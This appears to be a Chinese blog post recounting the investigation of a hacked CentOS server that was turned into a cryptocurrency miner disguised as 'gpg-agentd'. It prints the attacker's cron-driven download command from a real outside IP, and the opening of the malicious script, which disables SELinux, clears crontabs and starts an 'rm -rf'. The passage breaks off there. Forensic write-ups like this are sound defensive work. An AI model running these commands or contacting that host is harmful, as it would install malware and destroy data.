Linux被入侵，服务器变“矿机”

周一早上刚到办公室，就听到同事说有一台服务器登陆不上了，我也没放在心上，继续边吃早点，边看币价是不是又跌了。

不一会运维的同事也到了，气喘吁吁的说：我们有台服务器被阿里云冻结了，理由：对外恶意发包。

我放下酸菜馅的包子，SSH 连了一下，被拒绝了，问了下默认的 22 端口被封了。

让运维的同事把端口改了一下，立马连上去，顺便看了一下登录名 ：root，还有不足 8 位的小白密码，心里一凉：被黑了！

查找线索

服务器系统 CentOS 6.X，部署了 Nginx，Tomcat，Redis 等应用，上来先把数据库全备份到本地，然后 Top 命令看了一下，有 2 个 99% 的同名进程还在运行，叫 gpg-agentd。

Google 了一下 GPG，结果是：GPG 提供的 gpg-agent 提供了对 SSH 协议的支持，这个功能可以大大简化密钥的管理工作。

看起来像是一个很正经的程序嘛，但仔细再看看服务器上的进程后面还跟着一个字母 d，伪装的很好，让人想起来 Windows 上各种看起来像 svchost.exe 的病毒。

继续排查：

ps eho command-p 23374netstat -pan | grep 23374

查看 pid：23374 进程启动路径和网络状况，也就是来到了图 1 的目录，到此已经找到了黑客留下的二进制可执行文件。

接下来还有 2 个问题在等着我：

• 文件是怎么上传的？
• 这个文件的目的是什么，或是黑客想干嘛？

History 看一下，记录果然都被清掉了，没留下任何痕迹。继续命令 more messages：

看到了在半夜 12 点左右，在服务器上装了很多软件，其中有几个软件引起了我的注意，下面详细讲。

边找边猜，如果我们要做坏事，大概会在哪里做文章，自动启动？定时启动？对，计划任务：

crontab-e

果然，线索找到了。

作案动机

上面的计划任务的意思就是每 15 分钟去服务器上下载一个脚本，并且执行这个脚本。

我们把脚本下载下来看一下：

curl-fsSL 159.89.190.243/ash.php > ash.sh

脚本内容如下：

uname -a

id

hostname

setenforce 02>/dev/ null

ulimit -n 50000

ulimit -u 50000

crontab -r 2>/dev/ null

rm -rf